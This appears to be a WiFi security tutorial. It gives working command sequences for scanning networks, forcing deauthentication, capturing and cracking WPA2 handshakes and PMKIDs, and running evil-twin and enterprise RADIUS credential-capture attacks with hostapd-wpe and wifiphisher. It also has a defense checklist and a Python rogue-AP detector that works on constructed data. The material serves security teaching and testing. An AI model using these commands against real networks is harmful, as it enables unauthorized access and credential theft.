Key Takeaways

  • WPA2-PSK can still be cracked with weak passwords
  • WPA3 has SAE but isn't perfect
  • Evil Twin attacks bypass encryption
  • 802.1X Enterprise is significantly more secure

1. Wireless Security Fundamentals

Wireless networks are inherently less secure than wired networks: anyone within radio range can capture traffic without touching a cable. Understanding how WiFi security protocols work, and where they fail, is essential for both attackers and defenders.

WiFi Security Evolution

2. Wireless Reconnaissance

# Put wireless interface in monitor mode
airmon-ng start wlan0

# Scan for networks
airodump-ng wlan0mon

# Target specific network
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w capture wlan0mon

# Information gathered:
# - BSSID (MAC address)
# - Channel
# - Encryption type (WPA2, WPA3)
# - Connected clients
# - Signal strength

3. WPA/WPA2 Cracking

4-Way Handshake Capture

# Capture handshake (wait for client connect or deauth)
airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w handshake wlan0mon

# Force client to reconnect (deauthentication)
aireplay-ng -0 5 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon

# Crack with wordlist (airodump-ng -w handshake writes handshake-01.cap)
aircrack-ng -w rockyou.txt handshake-01.cap

# GPU cracking with hashcat (convert the capture to hashcat's 22000 format first)
hcxpcapngtool handshake-01.cap -o hash.hc22000
hashcat -m 22000 hash.hc22000 rockyou.txt

PMKID Attack (Client-less)

# Capture PMKID (no client needed!)
hcxdumptool -i wlan0mon -o dump.pcapng --enable_status=1

# Convert and crack
hcxpcapngtool dump.pcapng -o pmkid.hc22000
hashcat -m 22000 pmkid.hc22000 wordlist.txt

4. WPA3 Security

WPA3 replaces the WPA2-PSK handshake with SAE (Simultaneous Authentication of Equals), a password-authenticated key exchange. Because every password guess requires a live exchange with the access point, a captured handshake cannot be used for offline dictionary attacks the way a WPA2 handshake or PMKID can.

WPA3 Vulnerabilities

5. Evil Twin Attacks

Evil Twin (Rogue AP)

The attacker stands up a rogue AP broadcasting the same SSID as a legitimate network. Clients that associate with it send their traffic, including any credentials, through the attacker, so the encryption of the real network never comes into play.

# Create evil twin with hostapd-wpe
# 1. Set up fake AP
hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

# 2. Deauth clients from real AP
aireplay-ng -0 0 -a AA:BB:CC:DD:EE:FF wlan0mon

# 3. Capture credentials as clients connect to fake AP

# Automated with wifiphisher
wifiphisher -i wlan0 -e "Corporate WiFi"

6. Enterprise WiFi Attacks

# EAP-PEAP/MSCHAPv2 credential capture
# Use hostapd-wpe to capture RADIUS credentials

# Start evil twin with RADIUS
hostapd-wpe /etc/hostapd-wpe/hostapd-wpe.conf

# Captured credentials format:
# username:NETNTLM_HASH

# Crack with hashcat
hashcat -m 5500 enterprise_hashes.txt wordlist.txt

7. Defense Strategies

Wireless Security Checklist
  • Use WPA3 where possible, WPA2-Enterprise otherwise
  • Long, complex passwords: 15+ chars for PSK
  • 802.1X authentication: Individual credentials, certificate validation
  • Network segmentation: Guest, IoT, corporate
  • Wireless IDS: Detect rogue APs
  • Management frame protection: 802.11w
  • MAC filtering: Weak on its own, but adds a layer
  • Disable WPS: Known vulnerabilities
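The "Wireless IDS: Detect rogue APs" item above and the Evil Twin section are the defender's side of the same problem. The following is an added example, not code from the original page: a minimal rogue-AP check that compares scan results against an inventory of authorised BSSIDs and the authentication each SSID must advertise. The scan rows, the inventory and the expected-auth table are all constructed for this example; the rows use a simplified subset of the columns found in an airodump-ng CSV export.

```python
# Constructed scan rows (not a real capture) with a simplified subset of the
# columns airodump-ng's CSV export contains: BSSID, ESSID, channel, auth, power.
SCAN_CSV = """\
AA:BB:CC:DD:EE:FF,Corporate WiFi,6,WPA2 CCMP MGT,-52
AA:BB:CC:DD:EE:F0,Corporate WiFi,11,WPA2 CCMP MGT,-60
DE:AD:BE:EF:00:01,Corporate WiFi,6,OPN,-41
DE:AD:BE:EF:00:02,Corporate WiFi,1,WPA2 CCMP PSK,-45
11:22:33:44:55:66,Guest,1,OPN,-70
"""

# Hypothetical inventory of authorised APs: BSSID -> the SSID it may serve.
INVENTORY = {
    "AA:BB:CC:DD:EE:FF": "Corporate WiFi",
    "AA:BB:CC:DD:EE:F0": "Corporate WiFi",
    "11:22:33:44:55:66": "Guest",
}
# Auth token each of our SSIDs must advertise (MGT = 802.1X, OPN = open).
EXPECTED_AUTH = {"Corporate WiFi": "MGT", "Guest": "OPN"}


def parse_scan(csv_text):
    """Parse the CSV rows; the auth column becomes a list of tokens."""
    rows = []
    for line in csv_text.splitlines():
        if not line.strip():
            continue
        bssid, essid, channel, auth, power = line.split(",")
        rows.append({"bssid": bssid.upper(), "essid": essid, "channel": int(channel),
                     "auth": auth.split(), "power": int(power)})
    return rows


def detect_rogue_aps(rows, inventory, expected_auth):
    """Return (bssid, essid, reason) for APs advertising one of our SSIDs from an
    unknown BSSID or with weaker security than the real network (the evil-twin
    pattern). A twin that clones the BSSID too evades the inventory check, which
    is why the security-downgrade check is evaluated independently."""
    alerts = []
    for r in rows:
        bssid, essid = r["bssid"], r["essid"]
        if essid not in expected_auth:
            continue  # not one of our SSIDs
        if inventory.get(bssid) != essid:
            alerts.append((bssid, essid, "unknown BSSID advertising our SSID"))
        if expected_auth[essid] not in r["auth"]:
            alerts.append((bssid, essid, "security downgrade: %s instead of %s"
                           % (" ".join(r["auth"]), expected_auth[essid])))
    return alerts


if __name__ == "__main__":
    for bssid, essid, reason in detect_rogue_aps(parse_scan(SCAN_CSV), INVENTORY, EXPECTED_AUTH):
        print(bssid, repr(essid), reason)
```

On the constructed data the two DE:AD:BE:EF BSSIDs are flagged twice each (unknown BSSID plus downgrade to open or PSK), while the authorised APs and the open guest network produce no alerts.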

8. Essential Tools

# Recommended hardware:
# - Alfa AWUS036ACH (dual band, monitor mode)
# - Alfa AWUS036ACM
# - Panda PAU09

FAQ

Is cracking WiFi passwords illegal?
Yes, accessing networks without authorization is illegal. Only test networks you own or have written permission to test.
